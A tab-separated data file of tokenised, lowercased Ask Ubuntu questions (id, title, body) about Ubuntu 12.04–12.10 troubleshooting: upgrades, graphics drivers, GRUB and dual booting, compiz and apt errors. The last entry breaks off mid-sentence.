203774	how to change the width of desktop icon title in gnome ?	i want to make the title of the icon ( from the screenshot below ) narrower . how can this be done ?
203776	x fail : `` screen ( s ) found , but none have a usable configuration ''	i 've been running 12.04 ( 64-bit ) for quiet a while now without any major problems . but when trying to login in today , the gui failed to come on and was stuck at a flashing cursor . i switched to a console ( ctrl-alt-f1 ) to see what the problem is . looking in /var/log/xorg.0.log i get the following failure line : ( ee ) screen ( s ) found , but none have a usable configuration i thought it might be something to do with nvidia drivers so i did a purge of the nvidia stuff ( sudo apt-get purge nvidia* ) and reverted the xorg.conf file to the little failsafe one that uses vesa . but this still comes up with the same error , so i does n't look like it 's the nvidia stuff that 's causing the problem . i 'm really stumped now , any ideas ? i assume the last update has changed something , but i 'm not sure what was updated that could have caused this .
203777	what features were lost in 12.10 when the alternate cd was cut ?	some of the alternate cd features were added to the desktop cd ( like full encryption ) but some were lost ( like raid ) . what other features were lost ?
203778	how to copy many photo file names with date and time to spreadsheet	i have numerous motion detector photos ( jpgs ) i copy to a dvd every day . i would like to copy the file name , original creation date and time of each of these photos and then extract this information to a spreadsheet to do analysis . any help appreciated . am a new user to ubuntu 12.04 . thanks .
203780	why do i have an `` impossible to get exclusive lock '' error when upgrading ?	when i want to upgrade from ubuntu 12.04 to ubuntu 12.10 , just after the step called `` defining the new packages '' , the following message pops-up : impossible to obtain an exclusive lock . this usually means that another package management application ( such as apt-get or aptitude ) is already running . please first close that other application . what should i do ? original untranslated version : quand je veux upgrader ubuntu 12.4 vers la version 12.10 , après la `` définition de nouveaux paquets '' le message suivant s'affiche : « impossible d'obtenir un verrou exclusif . ceci signifie généralement qu'une autre application de gestion de paquets ( telle que apt-get ou aptitude ) est déjà en cours d'exécution . veuillez d'abord fermer cette application . » je ne sais pas quoi faire . merci de votre aide .
203789	what is the active mac address of my computer ?	while looking to find the mac address of my computer as it appears to a wireless network , it was recommended that i run ifconfig . having executed that command in the terminal , i noticed that , unlike my other machine , the connected network seemed to be listed as an ethernet , even though the built in wireless card is the thing i am currently using to post this . ifconfig output : lewisgoddard @ t42 : ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:0d:60:7b : d2:18 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) eth1 link encap : ethernet hwaddr 00:0c : f1:53:55 : c5 inet addr:192.168.1.10 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :20c : f1ff : fe53:55c5/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:716 errors:1 dropped:1 overruns:0 frame:0 tx packets:710 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:620786 ( 620.7 kb ) tx bytes:80480 ( 80.4 kb ) interrupt:11 base address:0xe000 memory : c0210000-c0210fff lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:182 errors:0 dropped:0 overruns:0 frame:0 tx packets:182 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:19665 ( 19.6 kb ) tx bytes:19665 ( 19.6 kb ) is it possible that ubuntu is confused somehow ? if not , am i misinterpreting my results , and my mac address may not be 00:0c : f1:53:55 : c5 ?
203797	how to install compiz extra animations ubuntu 12.10	i tried to install compiz-fusion-plugins-extra to get the burn effect and more animations for compiz , but the terminal told me it was unable to locate that package . how do you install the extra compiz animations in ubuntu 12.10 quantal ? thanks in advance !
203798	realtek rtl8188ce wireless is slow	the wireless used to be just fine now is dead slow . how i should troubleshoot this issue any idea ? thank you .
203801	probleme with theme in xubuntu 12.04	something happened and some butttons or even whole windows looks like in windows classic theme.also somethings changed in fonts . so i realized that i had turn off compositor in windows manager tweaks . and this partly helped.it helped only in xubuntu session , but login screen and for example ubuntu session still looks ugly..
203802	how to make `` perfect '' desktop cube ?	i was able to enable the compiz desktop cube in ubuntu 12.10 . i was wondering if it were possible , yet , to make a `` perfect '' cube . ( meaning instead of grey on the top and bottom , there were two more virtual desktops to replace them . ) here is a picture of the grey area 's i 'm talking about : is this possible ?
203804	i ca n't upgrade to 12.10	i 'm on 12.04 and i go to update manager but it keeps saying it 's up-to-date even though it does n't have 12.10 . is there something i have to do , some dev channel i need to be subscribed to , to get this to work ?
203807	the dash home button icon is an unexpected colour since upgrading . why ?	simple question . my dash home icon is yellow since upgrading to ubuntu 12.10 , even after a reboot . it looks weird to me . anyone know why ?
203811	ubuntu 12.10 no `` aditional drivers '' option after update from 12.04 nvidia ion le	r1600 acer revo hey guys i need help installing drivers via the command prompt , i read around and i saw that running jockey in text mode will open up the drivers , but i do n't know how to go about installing them .
203813	i ca n't load update manager	i can not open update manger . i get an error message : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_precise_partner_binary-i386_packages , e : the package lists or status file could not be parsed or opened . what 's the best way around this ?
203814	ubuntu 12.10 unity dash transparency problem	i have just upgraded my ubuntu 12.04 to 12.10 and there is following problem . when i press super button to show unity dash i get wrong background image behind the dash box . especially i can see part of the bottom of the screen . also when i set transparency to top panel the background behind is not correct . here is an example with mc duck picture : unity mc duck example do you have any ideas whats wrong ? my system preferences : ubuntu 12.10 32-bit intel® pentium ( r ) cpu g840 @ 2.80ghz × 2 geforce gts 450/pcie/sse2 any help will be highly appreciated !
203818	12.04 to 12.10 upgrade - software channels problem	i tried to update ubuntu from 12.04 to 12.10 , but i encountered a problem . the files downloaded in the first step of the update . it then went on to the second step , but it failed when it reached `` setting new software channels '' . i am not sure why this happened , but the upgrade process aborted and would n't continue . i would appreciat help please . thanks .
203821	where is the `` additional drivers '' dialog ?	where is the `` additional drivers '' dialog in ubuntu 12.10 ? i ca n't find it in the dashboard .
203824	is chroot the right choice for my use case ?	backstory : i am working on setting up a minecraft server and want to allow admins to have ssh access to the minecraft server console and appropriate mc server files , but not the whole system . the console provided by the minecraft server is only available to the user that launched the process . in addition , the admins will need terminal access to some basic cli tools such as wget , cp , mv , rm , and a text editor . plan : i have already setup the ssh aspect of things , requiring pre-shared keys and whatnot . setup a jailed environment in which all user activity will be contained . setup user accounts . - the first user account will be the minecraft user . the minecraft user will start the mc server in a multiuser screen session and allow the other admins to attach to it . - subsequent users should have their own /home directory for normal usage . setup acl for the appropriate files to allow each user to edit the mc server files . no one will be doing system updates , nor will anyone be installing any programs , so i 'll be the only user with sudo . the issues : i do n't want the ssh users to have access to the whole system . users will still need to use wget or curl to update the mc server files . i have no experience setting up a chroot environment and have found several tools to aid in this process . jailkit seems to be the most robust , but it 's not in the standard repos . the questions : is chroot the right tool for this use case , or is there something more appropriate for the job ? should there be a chroot environment for each user , or one chroot environment for all users ? should chroot be setup by hand , or should i use one of the tools available ? how will system updates effect a chroot environment ? which chroot tool is the most newb friendly ? which chroot tool is the most robust ? would a vm be a better solution overall ?
203830	android sdk path error : doesn´t find home directory	i use ubuntu 12.10 and i tried to follow this guide install android sdk and eclipse in ubuntu 12.04 but i keep getting this error : error : the avd manager normally uses the user 's profile directory to store avd files . however it failed to find the default profile directory . to fix this , please set the environment variable android_sdk_home to a valid path such as ¨~¨ . any ideas how can i fix this ?
203831	black screen in installation when nvidia graphic card plugged	when i try to install any recent version of ubuntu , the screen shows some green and purple mess ( like analog tvs when thers no signal ) . then , a black screen . i guess it keeps booting in live/install mode . but i ca n't see it . i tried installing from cd and usb , i tryed changing some bios settings ... i installed older versions , like 8.04 , and it worked , but after updating the system , it crashes again . that 's why i discovered that upgrading nvidia drivers , made system show a black screen again . after that , i unplugged the nvidia card and installed 12.04 with onboard card . it worked perfectly . then , i plugged nvidia again and system booted , but only showing that black screen again . i keep working with onboard card , so far ... the nvidia is a geforce 8500gt .
203834	why is 12.04.1 download so horrendously slow ?	i tried to install ubuntu side by side with windows but got problem with disk image could not be found . i even donated ! so i went to download the cd and to install off-line ... and now have been sitting on my thumbs for 1hr and 100 of 690 mb ...
203841	ubuntu 12.10 the location is not a folder	i just upgraded my ubuntu to 12.10 and i noticed that i get this message the location is not a folder whenever i try to access a mounted media ( usb or even my other partitions ) . i am now unable to view content on my usb pendrive or other partitions . already tried sudo apt-get remove exo-utils with no luck because it says it is not installed . can anyone help me ? update : this workaround seems to work for me http : //askubuntu.com/a/204226/59618
203844	apache doesnt start after upgrade to 12.10	during the upgrade process i was wondered for `` replace init.d '' , and i said `` keep '' , not replace . now , apache2 is not working . i tried removing and upgrading again , but doesnt start . i have this error message : sudo /etc/init.d/cron start rather than invoking init scripts through /etc/init.d , use the service ( 8 ) utility , e.g . service cron start since the script you are attempting to invoke has been converted to an upstart job , you may also use the start ( 8 ) utility , e.g . start cron
203848	ca n't /etc/hosts be set up automatically ?	what i need is : automatically add mac-addresses to some file and manually add the hostnames assigned to them , and a script will then scan my home lan for those mac-addresses and populate the /etc/hosts file , updating whatever cache . most importantly i do not want a centralized server that works as dns server 24/7 and consumes a lot of energy in addition to the energy consumed already by the modem offering its own lan-dhcp services . i.e . i need a decentralized dns service . has anyone ever heard of such a script ? what i want , but i guess that 's too much to ask , is some way to automatically read the /etc/hostname file of all computers at the moment they enter my lan and update name-resolution directly without the need for a /etc/hosts file . anyone an idea if that would be possible without altering the dhcp server ?
203849	how to get windows back ? lubuntu ?	i installed lubuntu and i do n't like it . i did a clean install to lubuntu rather than making it dual . now when i want to go back to windows it wo n't work . i put the windows vista cd in and it wo n't load . it just loads lubuntu back . i know for a fact that the cd works just fine . i do n't know what to do ? i did a little research and it says i deleted the windows loader or the partition . can someone help me ?
203850	how to install ubuntu on empty disk space along side win7 ?	i have a computer that is partitioned between ubuntu 12.04 and windows 7 . long story short , i wanted to make a fresh install of 12.10 , so i copied all of my personal data from 12.04 over to my win7 partition , the deleted the partition that had 12.04 on it : what i want to do now is install ubuntu 12.10 on all of the empty disk space . thus i open the installer , and i am presented with the option to install over the entire hdd , or `` something else '' . i click on something else , and i am presented with this window : how do i use this window to install ubuntu 12.10 over the rest of the unallocated/free space on my hdd ? i have no idea how to do it ... .
203851	any search tool for lxde menu ?	i just installed lxde to boot into when laptop is using battery , but i really miss at least a simple search feature , i am used to unity so i find myself losing too much time navigating on the menus , given that the lxde menu is just a list with a basic categorization . i would prefer to avoid creating shortcuts everywhere if possible .
203853	installing package + dependancies and removing them all	i currently use xubuntu and was considering installing/trying gnome shell or cinnamon by installing their respective metapackage . however , doing so would result in a massive number of dependencies being installed which would be almost impossible to remove individually at a later date if i decided i did n't like it . i wonder , therefore , if there is a way that i can track which packages synaptic automatically downloads as part of the process and create a script of some sort to remove them all as well . i could then rest assured that if i do n't like any of my new desktop environments , i can remove them in full without leaving a load of other applications and libraries lying around . thankyou for any help ! : )
203877	playonlinux is unable to find 32bits opengl library you might encounter problem with your games	my hardware configuration is intel core2duo 2.93ghz 4gb ddr2 ram msi g31 motherboard seagate 80gb pata harddisk i 'm new to linux and i 'm having this problem since few days , it was not there before . can you please help ? this is my terminal screen when i try `` playonlinux '' . bishek @ bishek-ms-7529 : ~ $ playonlinux [ main ] message : playonlinux ( 4.1.8 ) is starting [ clean_tmp ] message : cleaning temp directory [ check_opengl ] warning : 32bits direct rendering is not enabled [ check_opengl ] message : 64bits direct rendering is enabled [ main ] message : filesystem is compatible [ install_plugins ] message : checking plugin : capture ... [ install_plugins ] message : checking plugin : screencap ... [ install_plugins ] message : checking plugin : playonlinux vault ... /usr/share/playonlinux/bash/startup_after_server : line 38 : [ : : integer expression expected /usr/share/playonlinux/bash/startup_after_server : line 38 : [ : : integer expression expected [ maj_check ] message : list is up to date playonlinux is unable to find 32bits / 64bits opengl library
203880	12.10 no audio via hdmi and video speeds up	i have a laptop with an ati radeon 4200 , on 12.04 everything worked fine , since upgrading to 12.10 i can not get sound over the hdmi . when i switch to hdmi audio the video speeds up to about 2x . i can use the speakers in my laptop and watch video via hdmi with no problems . things i have tried : various tutorials to install the amd/ati drivers , all of which resulted in low graphics mode . checked that everything is properly set in alsamixer , the sound utility and - installed pavucontrol and checked everything in there . verified the output from cat /proc/asound/cards looks normal when i initially upgraded there was a plethora of problems which i believe were due to the old proprietary driver still being used but not compatible , after a few hours trying to fix that i decided just to back up and do a fresh install which works great except for the above stated problem . any help would be greatly appreciated ! ! finally hopefully this has n't already been answered , i have tried a few different searches on the boards and have n't come up with anything . $ aplay -l **** list of playback hardware devices **** card 0 : sb [ hda ati sb ] , device 0 : alc269vb analog [ alc269vb analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : hdmi [ hda ati hdmi ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 0/1 subdevice # 0 : subdevice # 0
203884	mount exfat partition in virtual guest machine	i have a real ubuntu 12.10 installation being virtualized under a windows 8 host , by using the vboxmanage.exe internalcommands createrawvmdk method . i 'm trying to mount an exfat partition into the virtualized machine ( which is the partition of shared work files ) , but even though i have fuse-exfat installed , and the partition is perfectly mountable while booting entirely into ubuntu , i ca n't mount it while virtualizing it . 1- if i make a full vmdk image of the hdd , including all partitions , ubuntu 12.10 `` sees '' the partition , and trying to mount it throws this error : image : http : //i.stack.imgur.com/ayusn.png 2- if i make a machine with only the linux partitions , + the exfat partition . again ubuntu `` sees '' the partition and the result is : error : fsync failed image : http : //i.stack.imgur.com/u4skc.png 3- if i make a machine with only the linux partitions , and try to mount it , ubuntu does n't `` see '' the partition , and i get this error : image : i.stack.imgur.com/q1hz5.png i 've tried using the virtualbox ' `` shared folders '' functionality but even though i install the `` guest additions '' , the system does n't seem to recognize the shared folder : image : i.stack.imgur.com/ylu0e.png help ? thanks !
203887	dim ( nearly blank ) laptop screen , secondary screen works - why ?	my laptop screen is ( almost ) black while my secondary screen is fine . i believe it to be backlight / brightness related . problem description it starts when i start the laptop system loads and works fine , just screen has problems i can see the screen though very faintly / dimly - it 's hard to see anything which ai n't very white e.g . starting screen has big thinkpad logo in white , large font - i can see it , though very dimly second screen works very well official backligtht debugging : using acpi setting as prescribed there for thinkpads did n't help i can see an entry in /sys/class/backlight/ and it changes when i press hotkeys for brightness ( current backlight power for instance goes up or down ) acpi-off did n't helpm neither did acpi_backlight=vendor hardware data laptop is thinkpad edge with glossy screen . 4 processors , 2 cores , exemplary cpu data from cat /proc/cpuinfo reports genuine intel i5 ( m 480 @ 2.67ghz ) . os is ubuntu lucid , 10.04 lts , 64-bit , with linux generic kernel ( 2.6.32-44 ) and gnome 2.32.2 ( though i doubt there lies the problem ) . $ lspci | grep vga 01:00.0 vga compatible controller : ati technologies inc m92 [ mobility radeon hd 4500 series ] $ lshw -c display *-display description : vga compatible controller product : m92 [ mobility radeon hd 4500 series ] vendor : ati technologies inc physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm pciexpress msi bus_master cap_list rom configuration : driver=radeon latency=0 resources : irq:33 memory : c0000000-dfffffff ( prefetchable ) ioport:2000 ( size=256 ) memory : f0300000-f030ffff memory : f0320000-f033ffff ( prefetchable ) driver i was not running any proprietary drivers , just checked with `` hardware drivers '' . there is one for ati that is suggested there , though i did n't need it so far . update : changing the driver to proprietary one ( ati/amd fglrx ) did n't help . tried and failed resetting / running on power or battery / charging / getting rid of static electricity / warming up *does n't help* this is not a blank-screen problem , at least it is n't following official ubuntu black-screen diagnostics - i can see my screen , though barely . what i will try next : - check last updates i 've made - iirc i am running on nomodeset already , but will verify this any ideas how to proceed best ? what is most probable cause ?
203888	ca n't delete file even as root	i tried to delete a directory by running sudo rm -rf google-chrome . this gave no output message but the directory was n't deleted . there is only one file remaining , google-chrome/default/user\ stylesheets/custom.css . i tried to cd to the user\ stylesheets directory and remove the file but that did n't work . i ran sudo rm custom.css , but the file was n't deleted ( and no output from rm ) . how can i delete it ? more info : ls -la custom.css gives -rw-rw-r -- 1 david david 0 oct 21 02:42 custom.css lsattr custom.css gives -- -- -- -- -- -- -e- custom.css ( the immutable bit is not set )
203889	i need help booting up ubuntu 12.10	i cant seem to load ubuntu 12.10 onto my new system . it uses the asrock pro4-m motherboard and an ivybridge core i3 precessor . with no hard drive initiallly connected the computer wont boot from the iso image . when i connect a reformated formerly xp hd i get ntldr is missing .
203894	raid 5 install on ubuntu server 12.04	environment : ubuntu server 12.04 , tried installing from bootable flash drive . got the following error : no root file system is defined . please correct this from the partitioning menu . i 'm trying to set up a personal file server with software raid 5 . i just got three hard drives for this , but have n't found any solid documentation . i 'm unsure what the basic way to partition my hard drives is . can someone upload a screenshot of their `` partition disks '' screen so that i can compare with mine ( attached ) ? i tired to upload an image , but it said that i need reputation 10+ to post an image ... should i set the bootable flag ? do i need a /home partition ? a /boot partition ? should i `` use [ my partition ] as : ext4 journaling file system '' ? or make that field `` physical volume for raid '' ? i am an engineer , but i have only a cursory knowledge of all-things-linux . if you know of any good learning resources i 'd be happy to hear about those too ( that way i do n't have to blindly follow deprecated tutorials online ) . thank you , references i 've looked into : https : //help.ubuntu.com/community/installation/softwareraid https : //help.ubuntu.com/12.04/serverguide/advanced-installation.html http : //forevergeeks.com/setup-ubuntu-server-with-raid-5/
203896	unity randomly fails to start	i am running ubuntu 12.10 quantal on a machine that is more than powerful enough to support unity . first off , my setup : gui boot is disabled . i boot into tty after which i use sudo lightdm to get to the desktop , i have bumblebee installed to enable optimus for my nvidia gt 540m graphics card . i have enabled edge triggers in ccsm . since the edge trigger settings were not being remembered after every login , i was advised to add the following entry to my startup : bash -c `` sleep 3 ; compiz -- replace '' now it so happens that sometimes , `` unity will randomly fail to load . i get a blank desktop with no titlebars or window edges . i have to right click and open wallpaper settings , this somehow enables me to use ctrl+alt+t to launch the terminal . here , typing sudo unity -- replace does cause unity to start but all none of my settings are stored , some buttons are missing etc . further , other attempts to start terminal run it as root and not as my username . however when i disable and re-enable unity through ccsm , my desktop returns to normal after a reboot . the problem is not even consistent . i am not sure as to what is the cause here . could it have something to do with the startup entry ? any help will be appreciated .
203898	sis update problem	my problem : i 've had lubuntu and windows xp dual boot for a long time . after some xp updates , it did something with the linux boot such that i could n't dual boot . i finally got in and updated lubuntu and completely removed windows . my sis video wont let me in now : screen 's frequency out of range i tried many solutions that did not work : removing # from # grub_gfxmode=640*400 worked for three startups , but failed on the fourth . the live cd works fine until installed . i give up and tried slitaz 4 and slitaz 3 and neither worked , but both work fine on my other laptop . i burnt salix 13.37 ( lxde-been wanting to try it anyhow ) and got kernel panic ! my usb xpud and browser linux 501 boot i do n't know how to install xpud if i would want to for this is a desktop . browser linux 501 seemed to have issues on live usb that do n't happen on mini laptop so did n't try install . other os like dsl etc . i know do n't want . so i dug out ubuntu 9.10 and it works fine . i know its unsupported , but every upgrade i try sis video fails ! i could live with 9.10 except even the best from /old-releases is firefox 3.6.17 how/where/could firefox 5.0.1 work on ubuntu 9.10 or will it need packages i cant install ? ( i 'm pretty sure anything past firefox 5.0.1 wont work in 9.10 - but did n't 9.10 have chromium ? i do n't see it ) this is a northbridge and southbridge chipset ( sis741gx/sis964l ) with an overclocked sempron . any ideas on how to upgrade without changing any of the sis video drivers in 9.10 that work great to a newer ubuntu or a way to roll back to them before restarting would work ?
203900	openconnect displayed conncect succesful , but actually can not access source on vpn network	i had install the openconnect plugin , and configure it well , when connect vpn , it displayed successful , but actually , i can not get the vpn network ip address , and ping the vpn network ip failed . what is this issue and how to fix it ?
203901	pc restarted or died when computing	i just upgraded 12.04 64-bit . when i run some code in matlab , the computer is always dead or it restarts . i could n't figure out the reason . although video card on the motherboard is only 32mb , i have nvidia video card and choose primary video card to be other in bios . can you give me some suggestion ? maybe first , i can start with some test to see the health of computer .
203902	no wireless lan hp pavillion dv6000	the physical switch is in the on position but the indicator light is red meaning its not on . when i boot into windows vista it works normal . i do not see any networks nor can i connect to anything . wired internet works .
203903	i ca n't start ubuntu due to `` windows failed to start '' error with wubi	i am unable to start ubuntu . i have windows and ubuntu 12.10 installed via wubi.exe . this is the error message i got : windows failed to start . a recent hardware or software change might be the cause . to fix the problem : 1 . insert your windows installation disc and restart your computer . 2 . choose your language settings , and then click `` next . '' 3 . click `` repair your computer . '' if you do n't have this disc , contact your system administrator or computer manufacturer for assistance . file : `\ubuntu\winboot\wubildr.mbr` status : 0xc0000098
203905	how do i uninstall ubuntu from my macbook and replace it back to mac ?	i recently switched my old 2006 i believe macbook to ubuntu because i wanted to try it out for a couple of things . i decided to reformat since i did n't have the space to dual-boot , but now when i want snow leopard back for my macbook it does n't let me install . it asks what disk i want to install to , but none show up . any help ? thanks .
203907	the package is of bad quality - google chrome	i 'm doing a fresh install of 12.10 and am trying to install google chrome . i 've downloaded the deb from http : //chrome.google.com and am installing it through the ubuntu software centre . i 'm getting a message : the package is of bad quality ( same as what is a `` bad quality '' package ? ) in the expanded section , the `` error '' states : e : google-chrome-stable : file-in-etc-not-marked-as-conffile etc/cron.daily/google-chrome is it safe to click on the `` ignore and install '' button ?
203910	boot windows from grub	i had windows 7 and ubuntu on my hard disk . i had installed ubuntu using wubi . to uninstall ubuntu i deleted the ubuntu partitions from windows 7 disk management . when i re-boot my computer it shows grub rescue > . what do i need to do to re-gain access to windows ? i do not have a windows 7 dvd . commands like rootnoverify , chainloader do not work in grub rescue . i get an unknown command error . ps : i am posting this from another computer : )
203912	how do i get grub_hidden_timeout=0 behavior when grub_disable_os_prober=false ?	i have a question about the grub2 implantation in ubuntu 12.04 . i have a dual boot system with windows 7 , ubuntu as the primary os . when i have # grub_disable_os_prober=true in my /etc/default file , grub boots to ubuntu without showing a menu , and shows the menu when i hold down shift , however , the menu does not have my windows 7 boot drive as an option . if i have # grub_disable_os_prober=false , windows 7 shows up in the grub menu , but the grub menu is always shown on system start , even though grub_hidden_timeout=0 and shift is not held . is there a way to have the os prober turned on , but only have the grub menu shown when shift is held down ?
203925	why is ubuntu so sluggish ?	i have noticed the trend that ubuntu is getting increasingly slower with each release . it used to be much faster than windows , but now it is really much slower . i have an asus g74sx with an i7 processor , 8gb of ram , and an nvidia geforce gtx 560m graphics card . i am currently using ubuntu 12.10 , but will probably be going back to 12.04 . ubuntu is running as the native operating system . there is really no reason for terminal to take more than 25 seconds to open . i love all of the stuff behind ubuntu , what it stands for and everything , but i need to at least be able to open gedit without waiting 3 minutes for it to open . sorry if this sounds like a rant . what can i do to get ubuntu running smoothly ?
203928	overheating when using flash	i am having overheating issues when watching flash videos . here is all the relevant information that i could think of . please help . -- often when playing flash videos it operates at 95 degrees c. -- only gets that hot when on full screen ( but still in the 80s otherwise ) -- sometimes reaches 100 degrees and shuts down . -- fan runs at around 4500 rpm when hot ( not to mention i can here it speed up ) -- happens under ubuntu 12.04 and 12.10 ( did not use ubuntu before then ) -- overheating happens on more than one site ( for example youtube and comedy central ) -- my computer does not overheat otherwise . -- usually runs around 50-60 degrees c. -- maybe if compiling or doing updates can it get to 70 or 75 degree c. -- have a dual boot , and under windows i do not have this issue . -- i use firefox , but have the same issue if using chrome -- i have a lenovo t410 , currently running ubuntu 12.10 -- intel® core™ i5 cpu m 540 @ 2.53ghz × 4 -- 4 gb of memory , 64 bit os -- graphics : nvs 3100m/pcie/sse2 thanks and let me know if you need more info , ben
203929	recordmydesktop outputs 1920x1072 instead of 1920x1080 , which is what my monitor resolution is	my monitor is 1920x1080 , but recordmydesktop records in 1920x1072 . anyone know how to fix this ? thanks in advance .
203930	unable to use web apps	firefox not asking to install webapps when i navigate to google docs , google reader . how do i rectify this . there are few other sites that does n't work too . but i would be happy if these 2 work for me as i have them in my daily use .
203934	how to safely remove a usb external drive ?	how i can safely remove a usb external drive ? ubuntu 12.10 does not come with this option , only to `` unmount '' the disk , but not `` eject '' . i have tried both usb sticks and with my external hard drive .
203935	how do i install compiz extra animations ?	i have tried the sudo apt-get install compiz-fusion-plugins-extra in the terminal window but it said that it ca n't find it , so if anyone of you know a way to get the extra animations i would be thankful for an answer ! i am using ubuntu 12.10 .
203936	how to remove the tips within nautilus 3.6 ?	new nautilus version 3.6 ( coming with gnome 3.6 / ubuntu 12.10 ) is showing annoying text tips on the bottom right/left edge as a new feature . is there a way to disable it ?
203938	how can i share a wifi signal with other machines on my wired network ?	i want to take in a wifi signal and provide internet service to this ubuntu machine and others on my hardwired ethernet connection . i have asked this elsewhere and only got 'it 's easy , use the gui ' but that was less than helpful . pointing me to where i can rtfm ( read the fine manual ) is fine too , or even put the details in here somewhere ! thanks for your support .
203939	mahjongg does n't display scores	since updating to 12.10 in mahjongg it always tells me i did n't make the top 10 , but it does n't show what the scores are . i used to following to reset the scores : https : //answers.launchpad.net/ubuntu/+source/gnome-games/+question/43471 however it still gives the same message and shows no scores . any suggestions ?
203943	screen saver no longer dims the display before shutting it down	i have a nvidia driver for my desktop computer . in 12.04 and all previous versions it would first start to dim and then switch to the off state if i did n't move the mouse for 10 min or so . since the upgrade to 12.10 there is no longer any hint that it is about to turn off , but rather it goes from 100 % to 0 % instantly . maybe some setting got screwed up in the update ? if so , where is it ? thanks , ilan
203946	ubuntu 12.10 login loop	i just installed ubuntu in dual boot with windows 7.. i 'm new to ubuntu so i found it very hard to install nvdia drivers for my nvdia graphic card.. i tried following some guides , with no luck and now my ubuntu login screen is stuck in a bootloop . it asks for my username password , i enter it correctly , then a black screen appers and quickly returns me back to the login windows asking me for my password again and again . how to resolve this issue ?
203950	is there an alternative to e4rat ?	i have tried using e4rat numerous times on two different computers following a couple of different guides , including the one on howtogeek . i have gotten up to the point every time where you add `` single '' to the end of the line starting with `` linux '' after pressing `` e '' in grub while ubuntu is selected . i do this , and every time i get a black screen with a little cursor blinking in the upper left corner of the screen , and no matter how long i leave the computer alone ( i once left it just sitting there for three hours straight ) that is all that shows up . i do not get a login prompt . i am able to type things if i press alt+f1 and what i have typed is hidden when pressing alt+f2 , and then shown again when i press alt+f1 . i am following the guides exactly and i always get the same results . so if anyone can recommend an alternative to e4rat or a solution to this problem , that would be great ! i am running ubuntu 12.10 , if that helps . thanks for your help in advance !
203952	fresh installation and user 's management	i have ubuntu 10.10 that works perfect for me and my family . now i would like to install a fresh 12.10 release . i have a separated /home partition . after installing a new version , i need to configure users on the system . how to add new users that will use the existing /home partition ? if i have user `` user1 '' and there is /home/users1 folder , would adding a new user `` user1 '' delete the existing /home/user1 folder and create a new one or it will use the existing /home/user1 folder ?
203954	.desktop file . there was an error lunching the application	i a new ubuntu 12.04 user . i 've read my stuff and copied/pasted code from here and there trying to make my second life client have a shortcut on the sidebar . i did this before ... i did a format to my hard drive and everything is lost . here are the details : filename= phoenixviewer.desktop code inside the file : [ desktop entry ] version=1.0 type=application name=phoenixviewer exec=/opt/phoenixviewer/snowglobe comment=phoenixviewer categories=games ; terminal=false icon=/opt/phoenixviewer/phoenix_icon.png startupnotify=true startupwmclass=snowglobe-do-not-run-directly my dash ca n't even see the file as a desktop element . it lists it as phoenixviewer.desktop and it has another icon than the one i list in code . the paths are correct . when i run it from nautilus in /usr/share/applications/ i get the error : there was an error lunching the application . and same goes if i copy paste the .desktop file on my desktop and run it . anyone can help ?
203957	update manager not starting	i get this after the update manager said `` check your internet connection '' w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/quantal/main/source/sources 502 bad request [ ip : 91.189.92.152 80 ] , w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/quantal/main/binary-i386/packages 502 bad request [ ip : 91.189.92.152 80 ] , e : some index files failed to download . they have been ignored , or old ones used instead .
203958	how to resize partitions when upgrading to 12.10 ?	i have got ubuntu 12.04 alongside windows 7 on dell inspiron mini 160 gb . the size of ubuntu is not sufficient now . can i redraw partition size when upgrading to ubuntu 12.10 , as i find myself not able to understand gparted .
203960	high temperature on my laptop with radeon mobility hd4670	as almost everyone here , i guess , in these days i downloaded quantal quetzal to give it a try . however i noticed that my laptop runs fairly hot with cooling fans almost always on , even sitting in the desktop doing nothing . i downloaded xsensor to read temperature sensors , and i saw that while cpu stays on about 65째c , so quiet normal i guess , the gpu sits at 75째c . in comparison my actual windows 7 installation , which dual boots witb quantal , stays at 59째c cpu and 65째c . so i went reading and learned that amd dropped support for my video card from fglrx package , and that fglrx-legacy wo n't support 1.13 xorg , so i 'm basically stuck with oss drivers . so i was guessing if there 's anything i can try , and if it 's possible that the oss drivers could be the cause of the high temperature ?
203965	i just installed 12.10 and how do i update unity ?	i ca n't access the launcher , unity , or anything and have to use basic terminal commands to do anything . i keep getting this error when trying to update manually : the following packages have unmet dependencies : libqtgui4 : i386 : depends : libtiff5 : i386 ( > 4.0.0-1~ ) but it is not installed libsane : i386 : depends : libtiff5 : i386 ( > 4.0.0-1~ ) but it is not installed libtiff4 : i386 : depends : libjbig0 : i386 but it is not installed please help . thanks .
203966	how to repair dependencies in apt-get to the previous state ?	recently i tried installing teamviewer7 on my ubuntu 12.04 . i tried downloading the deb which due to some reason never did finish its download ( stopped at ~~10mb/17mb ) . expectedly , installing the same gave unmet dependencies . i followed instructions given sudo dpkg -i teamviewer_linux.deb sudo apt-get install -f this is to my memory the only changes i did to the system . following this , my apt-get or dpkg seem to be broken . following is a sample call which returns errors in subprocesses . ( specially not : dpkg and install-info ) $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 34 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up install-info ( 4.13a.dfsg.1-8ubuntu2 ) ... /var/lib/dpkg/info/install-info.postinst : 32 : /var/lib/dpkg/info/install-info.postinst : update-info-dir : not found dpkg : error processing install-info ( -- configure ) : subprocess installed post-installation script returned error exit status 127 errors were encountered while processing : install-info e : sub-process /usr/bin/dpkg returned an error code ( 1 ) also , my synaptic manager , google chrome ( if thats of any consequence ) are not opening at all while firefox et all seems to 